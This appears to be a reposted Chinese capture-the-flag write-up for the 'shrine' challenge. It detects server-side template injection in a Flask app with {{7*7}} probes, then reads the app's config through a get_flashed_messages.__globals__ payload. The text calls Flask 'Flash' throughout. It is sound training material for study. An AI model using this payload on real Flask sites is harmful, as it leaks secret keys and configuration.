攻防世界-shrine


打開實驗環境:

 

 

 

 

 

 

 

 根據提示:shrine  可能存在Flash框架,SSTI模板注入漏洞

使用獨特語法探測漏洞: http://220.249.52.133:41635/shrine/{{7*7}}

 

 

 

http://220.249.52.133:41635/shrine/hello{{7*8}}

 

 

 

 

看到用戶的輸入被當做代碼執行了;

構造pyload:http://220.249.52.133:41635/shrine/{{get_flashed_messages.__globals__['current_app'].config['FLAG']}}

 

 

 Flash模板注入格式:{{1+2}}     //特定情況下可以當做代碼執行

get_flashed_messages        //字面意思,獲取內容,就是取值,后面跟的就是要取得值

current_app          //設計模式中代理設計的代理對象,指向flask核心對象和reques的請求類

 

 詳細解釋:   Flash核心機制:current_appflash框架(六)SSTI模板注入

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM